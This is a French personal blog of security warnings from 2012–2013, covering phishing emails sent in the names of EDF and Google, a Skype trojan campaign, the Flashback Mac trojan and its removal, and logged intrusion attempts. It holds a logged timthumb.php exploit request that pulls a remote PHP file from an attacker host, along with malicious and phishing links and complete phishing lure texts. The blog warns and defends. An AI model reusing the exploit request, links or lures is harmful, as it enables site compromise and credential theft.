piratage

29-04-2013

ça me gave ces tentatives d’intrusion: 27.159.214.5

Le pire c'est que ça fait trois jours selon les logs ...

/?page=login&cmd=register
/index.php?page=en_Signup
/?do=/user/register/
/signup.php
/index.php?action=registernew
/?option=com_registration&task=register
/index.php?option=com_registration&task=register
/profile.php?mode=register&agreed=true&coppa=0
/ucp.php?mode=register
/index.php?app=core&module=global&section=login
/index.php?act=Login&CODE=00
/YaBB.cgi/
/join.php
/YaBB.pl/
/registration_rules.asp?FID=0

31-01-2013

Votre prélèvement bancaire a été refusée par votre banque EDF: Phishing attention

EDF - Phishing - hameçonnage Arnaque
Votre prélèvement bancaire a été refusée par votre banque.

BC-DP_P-AEL-AUTOMATE@edf.fr via eigbox.net

Chèr(e) Client(e),

Votre prélèvement bancaire a été refusée par votre banque.Afin de régulariser votre situation veuillez vous refferez ci-dessous:

Cliquez ici pour résoudre ce problème (pgravelandbestratingen.nl/logs/fr)

Lors d'echec de regularisation de votre situation, nous procèderons à la suspension de votre fourniture d'energie.Cette intervention vous sera facturée

Merci de votre confiance

Dominique REMOND
Directeur Service Client

Return-Path:

Sources:
lemonde.fr
Les clients EDF sont la cible d'une tentative d'escroquerie géante ....

Phishing : vaste campagne visant les abonnés EDF
Arnaque à très grand échelle : des faux e-mails envoyés à des centaines de milliers de clients d'EDF

12-11-2012

regler votre facture N° FRXXXXXXXX : service.client@edf.fr : phishing

regler votre facture N° FRXXXXXXXX : phishing

Return-Path:
Received: from smtp01.atlngahp.sys.nuvox.net
Received: from edf.fr (216.199.211.105.nw.nuvox.net [216.199.211.105]) by smtp01.atlngahp.sys.nuvox.net (8.13.1/8.13.1) with ESMTP id qAAAPJ7N014109
Message-ID: <20121110053015.A5EEED8199889F46@edf.fr>

Cher(e) EDF Client(e)
Votre paiement à été refusée par votre établissement bancaire en raison d'un problème technique sur le système de prélèvement automatique,
Pour eviter la pénalités de retard ,nous vous donnons la possibilité de payer en ligne en utilisant votre carte bancaire,
Afin de régler votre facture N° FR78441012 ,cliquer sur le lien ci-dessous :
‹‹ Régler votre facture ››
Lors d'échec de régularisation de votre situation , nous procéderons à la suspension de fourniture d'énergie ,Cette intervention vous sera facturée .

Merci de votre confiance .

15-10-2012

Vous disposez désormais du « journal » Facebook, un nouveau type de profil => phishing ?

Vous disposez désormais du « journal » Facebook, un nouveau type de profil

notification+kjdmh_ku7jvd@facebookmail.com

Vous disposez désormais du « journal » Facebook, un nouveau type de profil.
Le journal est une collection de toutes vos photos, publications et expériences qui vous représentent. Accédez à Facebook pour choisir votre photo de couverture, ajouter des photos et des événements importants de votre vie, ainsi que d’autres contenus que vous aimez.

Dans tous les cas si vous êtes dans le doutes mettez à la poubelle !!

10-10-2012

http://goo.gl/Ya6Se?image skype => cheval de troie

http://goo.gl/Ya6Se?image skype - Skype_todaysdate.zip

Ne cliquez pas sur le lien, il contient un fichier zip qui dissimule un troyen - trojan (cheval de troie)

Troyen ou cheval de troie:
Logiciel conçu pour exécuter des actions à l’insu d'un utilisateur (prise de contrôle à distance...)

Plus d'infos:
http://www.zenbien.com/skype-attention-malware-troyen-trojan

- проблема http://goo.gl/Ya6Se?
- lol is this your new profile pic? http://goo.gl/ya6se?image=
- co to jest http://goo.gl/ya6se?image
- crfqg http://goo.gl/ya6se?
- hey c’est votre nouvelle photo de profil

TROJAN !!!

Pour nettoyer efficacement windows des troyens-trojan:
- Malwarebytes, un anti spyware/troyen (http://fr.malwarebytes.org, "http://fr.malwarebytes.org/mbam-download.php)
- Hitman PRO (http://www.surfright.nl/en/hitmanpro, http://www.surfright.nl/en/downloads/)
- Avira (si vous n'avez pas d'anti virus, http://www.avira.com/fr/avira-free-antivirus, http://www.01net.com/telecharger/windows/Securite/antivirus-antitrojan/fiches/13198.html)
- Microsoft Security Essentials (http://windows.microsoft.com/fr-FR/windows/products/security-essentials)
- Comodo Cleaning Essentials (http://www.comodo.com/business-security/network-protection/cleaning_essentials.php)
- CCleaner (http://www.piriform.com/ccleaner, http://www.filehippo.com/download_ccleaner)

Info sur skype:
http://heartbeat.skype.com/2012/10/malicious_activity_in_skype_ch.html

10-10-2012

Skype, attention malware, troyen trojan

Un ver informatique essai de se propager en exploitant l'API skype.
Un message spam affiche (toutes les 20 minutes) un lol accompagné d'un lien de téléchargement (fichier zip Skype_todaysdate.zip)
Le fichier contient un cheval de troie - troyen ou trojan....

Ce troyen permet de prendre le contrôle d'un ordinateur sur Windows.

Source: génération NT

L'ordinateur infecté pourrait rejoindre les rangs d'un botnet (Dorkbot)
Possibilité de tomber sur une attaque de type ransomware, demande de rançon
L'utilisateur est informé que ses fichiers ont été cryptés et il doit payer de 200 dollars sous 48 heures sous peine de suppression.
lol is this your new profile pic? http://goo.gl/Ya6Se?image=username

- C2C service

Info sur skype:
http://heartbeat.skype.com/2012/10/malicious_activity_in_skype_ch.html

We take the user experience very seriously, particularly when it comes to security. We are aware of some recent reports of malicious activity and are working quickly to take appropriate action to protect users. We continue to recommend upgrading to the latest version of Skype and applying updated security features on your computer. Additionally, following links - even when from your contacts - that look strange or are unexpected is not advisable

04-10-2012

timthumb.php src img.youtube.com.alsahiltextiles.com/mct.php

Une tentative d'exploitation de faille timthumb.php (plugin wordpress)

Le plugin Timthumb de wordpress permet de redimensionner les images automatiquement.
Celui ci comporte une faille exploitable ...

GET /wp-content/plugins/wordpress-gallery-plugin/timthumb.php?src=http://img.youtube.com.alsahiltextiles.com/mct.php

17-07-2012

Apple Store : une application SPAM = Find and Call

Selon Kaspersky l’application Find and Call présente sur l’App Store récupère les contacts à l’insu de l’utilisateur puis envoie des courriels et SMS publicitaires à tous les destinataires.
Kaspersky dénonce la présence de l’application Find and Call qui transfert sur ses serveurs les contacts du carnet d'adresse puis envoie ensuite des messages publicitaires à toutes les personnes en affichant le numéro du mobile source pour leurrer les destinataires.

Si Find and Call ne représente pas une réelle menace, son fonctionnement est bien celui d’un logiciel malveillant.

Source:
securelist.com
businessmobile.fr

13-04-2012

Retirer-supprimer Flashback le cheval de Troie mac : apple fournit son logiciel enfin

Retirer-supprimer Flashback le cheval de Troie mac : apple fournit son logiciel enfin

Apple vient de diffuser un logiciel, enfin une mise à jour plutôt de suppression de Flashback et ses variantes connues, ainsi qu'une désactivation d'une fonction du plugin java par prévention.

Cette solution de sécurité d’Apple permet aux utilisateurs de protéger leur système Mac OS X sans avoir à installer un antivirus (patch kaspersky, f-secure avec Flashback Removal Tool etc...)

Nb:ce correctif ne vous protège pas des prochaines variantes, il vous faudra dans ce cas appliquer les dernières mises à jour du correctif.
Aussi, les estimations de postes infectés déclarées par apple seraient inférieures à celles annoncées par les éditeurs d'antivirus (Dr Web ...) qui serait de 600 000

Comment faire la mise à jour de suppression flashback?:

=> Menu pomme (icone de la pomme!) => Mise à jour logiciel (en haut à gauche)

Lien:
support.apple.com : support.apple.com/kb/HT5242?viewlocale=fr_FR&locale=fr_FR
news.cnet.com : apples-flashback-malware-remover-now-live
zdnet.fr : flashback-apple-diffuse-son-logiciel-de-suppression-du-malware

13-04-2012

Apple renforce sa sécurité des comptes: 3 questions secrètes = phishing ?

Apple renforce sa sécurité des comptes: 3 questions secrètes = phishing ?

Apple dans le carde d'une campagne de sécurité demande aux utilisateurs avec compte iThunes de créer trois questions et réponses de sécurité, d'ajouter une nouvelle adresse email...
Une fois ces réponses faites, l'achat et le téléchargement de contenu devient possible.

Aujourd'hui, les spams, tentatives de phishing, hameçonage, scams, vol de compte etc ... sont tellement courant que tout le monde se méfie.

L'action d' Apple devient donc suspecte !!!
La page de discussion (https://discussions.apple.com/___sbsstatic___/maintenance.html?start=0&tstart=0) est submergée de questions en ce moment, au point de mettre le forum hors service

Sources:
thenextweb.com : apple-enhances-apple-id-account-security-in-itunes-and-on-ios-devices-leaving-users-confused
macplus.net : apple-id-apple-renforce-la-securite

Thank you.

You’ve taken the added security step and provided a rescue email address. Now all you need to do is verify that it belongs to you.

The rescue address you have given us is xxx@xxx.com. Just click the link below to verify, sign in using your Apple ID and password, then follow the prompts.

The rescue email address is dedicated your security and allows Apple to get in touch if any account questions come up, such as the need to reset or change your security questions. As promised, Apple will never send you any announcements or marketing messages to this address.

We'll be back soon
We are busy updating Apple discussion for you and will be back shortly

5 Commentaires

12-04-2012

Affaire virus Flashback, apple laisse les éditeurs faire le travail à sa place.

Affaire virus Flashback, apple laisse les éditeurs faire le travail.

Depuis quelques jours le cheval de troie (troyen-trojan) flashback fait trembler les utilisateurs MAC

Une page sur le site apple recommande juste de désactiver Java qui contient une faille de sécurité, sans fournir plus d'informations sur un correctif.

En même temps les éditeurs proposent des solutions de détection et de suppression du virus (et se font une pub en même temps), les plus connus étant f-secure et kaspersky.

Au passage, un bourde d'apple qui a demandé à un bureau d'enregistrement de domaine russe (reggi.ru) de couper un domaine utilisé soit disant comme serveur de contrôle et de commande, ce serveur est en fait utilisé par Dr Web pour recenser les machines infectées et tenter de mieux comprendre son fonctionnement.

M. Sharov (Dr Web) déplore l’absence de réponse d’Apple aux mises en garde de sa firme qui a partagé « toutes ses données avec eux ». Sans obtenir de réponse...

La meilleur solution manuelle (plus délicat) pour détecter et supprimer le virus provient de f-secure
http://www.f-secure.com/v-descs/trojan-downloader_osx_flashback_i.shtml

La meilleur solution logiciel pour détecter et supprimer le virus provient de kaspersky
http://flashbackcheck.com/

Liens:
01net.com : malware-flashback-apple-prepare-son-patch-et-contacte-les-fai

06-04-2012

Supprimer-Enlever BackDoor Flashback sur mac OS X : Cheval de troie

Supprimer-Enlever BackDoor Flashback sur mac OS X : Cheval de troie

f-secure, une société finlandaise spécialisée dans la sécurité informatique nous propose des solutions pour détecter et supprimer le BackDoor Flashback des postes mac-apple (os x) infectés
Attention, les manipulation sont à faire par des personnes compétentes.

En France, la probabilité d'être infecté est de 0,56% , actuellement 3000 postes sont touchés (20 minutes)

Voici une capture en provenance de f-securede la méthode à suivre pour détecter et supprimer le troyen

Manual Removal

Caution: Manual disinfection is a risky process; it is recommended only for advanced users. Otherwise, please seek professional technical assistance. F-Secure customers may also contact our Support.

1. Run the following command in Terminal: //exécuter la ligne de code ci-dessous dans un terminal os x

defaults read /Applications/Safari.app/Contents/Info LSEnvironment

2. Take note of the value, DYLD_INSERT_LIBRARIES
3. Proceed to step 8 if you got the following error message://passez à l'étape 8 si vous rencontrez le message suivant

"The domain/default pair of (/Applications/Safari.app/Contents/Info, LSEnvironment) does not exist"

4. Otherwise, run the following command in Terminal:

grep -a -o '__ldpath__[ -~]*' %path_obtained_in_step2%

5. Take note of the value after "__ldpath__"
6. Run the following commands in Terminal (first make sure there is only one entry, from step 2):

sudo defaults delete /Applications/Safari.app/Contents/Info LSEnvironment

sudo chmod 644 /Applications/Safari.app/Contents/Info.plist

7. Delete the files obtained in steps 2 and 5
8. Run the following command in Terminal:

defaults read ~/.MacOSX/environment DYLD_INSERT_LIBRARIES

9. Take note of the result. Your system is already clean of this variant if you got an error message similar to the following:

"The domain/default pair of (/Users/joe/.MacOSX/environment, DYLD_INSERT_LIBRARIES) does not exist"

10. Otherwise, run the following command in Terminal:

grep -a -o '__ldpath__[ -~]*' %path_obtained_in_step9%

11. Take note of the value after "__ldpath__"
12. Run the following commands in Terminal:

defaults delete ~/.MacOSX/environment DYLD_INSERT_LIBRARIES

launchctl unsetenv DYLD_INSERT_LIBRARIES

13. Finally, delete the files obtained in steps 9 and 11.

Bon je ferais une petite traduction plus tard...

Liens:
- f-secure.com : v-descs/trojan-downloader_osx_flashback_i
- pcinpact.com : osx-trojan-flashback
- 20minutes.fr : high-tech/apple/912093-apple-cheval-troie-infecte-600000-macs

06-04-2012

BackDoor Flashback 39 : un cheval de troie (troyen-trojan) qui fait peur aux mac-apple OS X

BackDoor Flashback 39 : un cheval de troie (troyen-trojan) qui fait peur aux mac-apple OX X

Les mac, ordinateurs apple (macbook, powermac sur système Mac OS X) ne sont plus à l'abris de virus...
BackDoor Flashback 39 un cheval de troie (troyen-trojan) a infecté plus de 550 000 postes apple selon l'éditeur d'antivirus russe Dr.Web.

Ce virus utilise trois vulnérabilités (faille de l'environnement java installés dessus), exploitable par code javascript.

Prévention:
Java a publié une mise à jour pour éviter l'infection, éviter ne veut pas dire retirer.

Correction:
- www.pcinpact.com : osx-trojan-flashback
- www.f-secure.com : trojan-downloader_osx_flashback

Conclusion:
Pc ou mac, vous n'êtes jamais à l'abris d'intrusion.
Éteignez vos ordinateurs, et allez faire du sport !!! (à moins que vous ayez aussi attrapé le virus de la grippe...)

Liens:

- Le Point: un-demi-million-de-mac-infectes-la-fin-d-un-mythe
- Le Monde : les-mac-d-apple-seraient-vises-par-une-attaque-informatique
- 01net.com : le-botnet-flashback-met-a-mal-le-sentiment-d-invulnerabilite-sur-mac

05-04-2012

Google : Fermeture Systématique De Votre Compte ! => arnaque, attentions !!!

Google : Fermeture Systématique De Votre Compte ! => arnaque, attentions !!!

GOOGLE INFO ! reception_messagerie@mail.com
angia.vaudron@gmail.com

Return-Path: reception_messagerie@mail.com

Il y a de plus en plus de tentative de vol de compte gmail (et autres, AOL, YAHOO, HOTMAIL etc...) en ce moment, faites attention.

Cher (e) membre,

Pour des raisons techniques, le serveur ne nous permet pas de répertorier votre messagerie. Veuillez
compléter les champs ci-dessous afin que nous puissions confirmer votre Identité . Tout refus entrainera la
fermeture systématique de votre adresse .

Informations obligatoires

Nom & Prénom*:...........................
Date de naissance*:......................
Mail de Connexion*:..........................
Mot de Passe*:...........................
Confirmation mot de passe:................
N° fixe*:................................
N° Mobile*:..............................
Pays & Ville*:...........................
Fonction*:...............................

Nous vous souhaitons une bonne Compréhension.

© 2012 - pour les organisations - Règles de confidentialité - Règlement du programme - Conditions d\'utilisation.

27-03-2012

Microsoft, avec des mandats judiciaires fait sa propre police …

Microsoft, avec des mandats judiciaires fait sa propre police ...
Fraudes et vol d'identité:

Microsoft a fait saisir deux serveurs dans deux états américains (Pennsylvanie et Illinois).
Ces serveurs contrôlaient des ordinateurs infectés par un virus (botnet Zeus) capable de copier des numéro de comptes et des codes secrets bancaires.

Microsoft dispose d'une unité interne de lutte contre le crime numérique, les escroqueries en ligne (le piratage etc...)

En même temps Microsoft envoi à certaines entreprises des courriers (fausse mise en demeure...) dans le cadre d'une "campagne promotionnelle de conformité de licences"

Objectif: sensibiliser (faire peur !!) les entreprises qui détournent les licences.
Solution => passez par des solutions libres alternatices
- Windows seven/xp/vista => ubuntu
- Microsoft office => open office
- Word +> writer
- Excel => calc
- Outlook => thunderbird

www.microsoft.fr/conformite-licences
www.microsoft.com/france/pme/comment-acheter/suis-je-conforme/

Liens:
20 minutes voir l'article
liberation microsoft-joue-les-policiers-informatiques-et-saisit-des-serveurs-aux-usa
http://bolt1024.over-blog.com/article-7290045.html
http://www.geekzone.fr/ipb/topic/40745-petite-lettre-damour-de-microsoft/

Autres actualités microsoft:
Microsoft offre des licences gratuites aux employés du Parlement européen
source: zdnet.fr microsoft-propose-des-licences-gratuites-aux-employes-du-parlement-europeen

- Des licences Office gratuites (Office, Project, Visio...) pour les postes personnels des employés du Parlement européen

14-03-2012

Troyen, trojan, cheval de troie, malware, nettoyer ou formatter?.

Troyen, trojan, cheval de troie, malware, nettoyer ou formatter?.

Les utilisateurs mac/apple/macbook/linux sont moins soumis à ces risques

Vous utilisez un système windows (xp, 2000, vista, seven etc) et:
- Vous avez téléchargé un fichier de source inconnu
- Vous avez cliqué sur un exécutable de petite taille (qu'on vous a envoyé) et il ne se passe rien
- Vous avez un doute sur la présence de virus ou de troyen (trojan, cheval de troie...) sur votre ordinateur
- Votre ordinateur ralenti anormalement
- Vos téléchargements ralentissement anormalement
- Des choses inhabituelles se passe sur votre ordinateur

Si vous suspectez la présence de virus ou troyen, déconnectez votre ordinateur de votre ligne internet (arrêtez le wifi, débranchez le câble réseau ou éteignez votre modem livebox, neufbox...)

Ensuite

La meilleure solution pour éliminer ces risques est de faire formater/réinstaller votre système d'exploitation
- La plupart des des ordinateurs récents ont un système de restauration intégré qui s'active au démarrage de l'ordinateur (cherchez la doc de votre modèle)
- Si vous êtes assez débrouillard la restauration est accessible, sinon demandez à un proche de le faire
- Munissez vous d'un disque du externe et faites les sauvegardes de vos documents importants
---Le contenu de Mes Documents (qui contient vos photos, téléchargements...)
---Le contenu de votre bureau
---Vos favoris de navigateur (internet explorer, firefox, chrome)
---Vos plugins navigateurs pour ceux qui les utilisent

Si vous ne voulez pas formater alors essayez de nettoyer votre ordinateur en exécutant ces logiciels suivants un par un (pas en même temps)
Vérifiez la version de votre système d'exploitation (32 ou 64 bit) afin de télécharger les bonnes versions.

- Malwarebytes, un anti spyware/troyen (http://fr.malwarebytes.org, téléchargement)
- Hitman PRO (http://www.surfright.nl/en/hitmanpro, téléchargement)
- Avira (si vous n'avez pas d'anti virus, http://www.avira.com/fr/avira-free-antivirus, téléchargement)
- Microsoft Security Essentials (http://windows.microsoft.com/fr-FR/windows/products/security-essentials)
- Comodo Cleaning Essentials (http://www.comodo.com/business-security/network-protection/cleaning_essentials.php)
- CCleaner (http://www.piriform.com/ccleaner, téléchargement)

11-03-2012

Concours de hacking, un Français fait tomber chrome, google refuse de payer la prime

Concours de hacking, un Français fait tomber chrome, google refuse de payer la prime

Concours: Pwn2Own et Pwnium (concours de hacking CanSecWest)
Lieu:Vancouver au Canada

Un Français Vupen Security a exploité une combinaison de failles.
- Une première pour passer à travers le bac à sable intégré à Google Chrome
- une seconde réduisant au silence les technologies de sécurité intégrées à Windows

Un composant Flash ait été utilisé

L’organisateur du concours va payer 60 000 dollars à Vupen Security, Mais comme le Français refuse de révéler les failles utilisées, Google ne lui versera pas de prime.
Google marque son désaccord envers les règles du concours Pwn2Own, qui permettent aux hackers de dévoiler une faille sans expliquer quels bogues ont été exploités.

Les failles valent beaucoup plus cher que 60 000 dollars sur le marché ...

Source:
- itespresso google-chrome-tombe-finalement-face-aux-attaques-des-hackers

29-02-2012

Google, guide de la confidentialité et de configuration: Valider un numéro

Google, guide de la confidentialité et de configuration

Objet:
Valider un numéro de téléphone portable:

Pourquoi?:
Si une connexion sur votre compte se fait à un endroit inhabituel, une validation par sms sera demandé pour pouvoir accéder eu compte...
Cette manipulation réduit donc le risque de piratage de votre compte gmail

Comment faire:
- Aller sur la page de configuration (settings) de votre compte google
https://www.google.com/settings/
- Chercher la ligne suivante:

Validation en deux étapes	Désactivée  	Modifier

- Cliquez sur Modifier
- Saisissez votre numéro de portable, cochez SMS et cliquez sur Envoyer le code ...
- Vous aller reçevoir un SMS avec le code de validation envoyé par google (en provenance pour moi du +447781470659), le message est Votre code de vérification Google est XXXXXX
- Saisissez le code envoyé par SMS dans le champ code puis cliquez sur le bouton Valider
- Suivant
- Mémorisez pour 30 jours l'ordinateur que vous utilisez actuellement (si besoin...)

Maintenant vous pouvez activer la validation en deux étapes à chaque fois que vous vous connecterez d'un lieu inhabituel ...
Attention, cette activation est contraignante si vous utilisez plusieurs postes pour consulter vos mails ... à vous de décider le niveau de sécurité que vous voulez donner à votre compte.

1 Commentaire

27-02-2012

Nicolas Sarkozy est mort, vrai ou faux ? => piratage !

Les faits (vrai ou faux?):
Une dépêche de l’AFP aurait annoncé que Nicolas Sarkozy aurait trouvé la mort dans un accident de la route.... vérité ou mensonge?
le Président de la république aurait succombé à ses blessures pendant son transport...
Faux communiqué MPS 1871

La vérité:
le Président de la République Française est toujours VIVANT !!

Un site d'information économique toulousain (Midi Presse Service) piraté a diffusé dimanche une fausse dépêche annonçant la mort de Nicolas Sarkozy.
=> dépêche de l'AFP

Un renforcement de la sécurité du site était à l'étude, on ne connait pas encore le ou les responsables.
Le groupe La Dépêche du Midi a présenté à M. le président de la République Nicolas Sarkozy toutes ses excuses"

Liens:
- www.zataz.com Nicolas-Sarkozy-a-trouve-la-mort-dans-un-accident-de-la-route--faux-communique--fausse-info
- www.europe1.fr La-fausse-mort-de-Nicolas-Sarkozy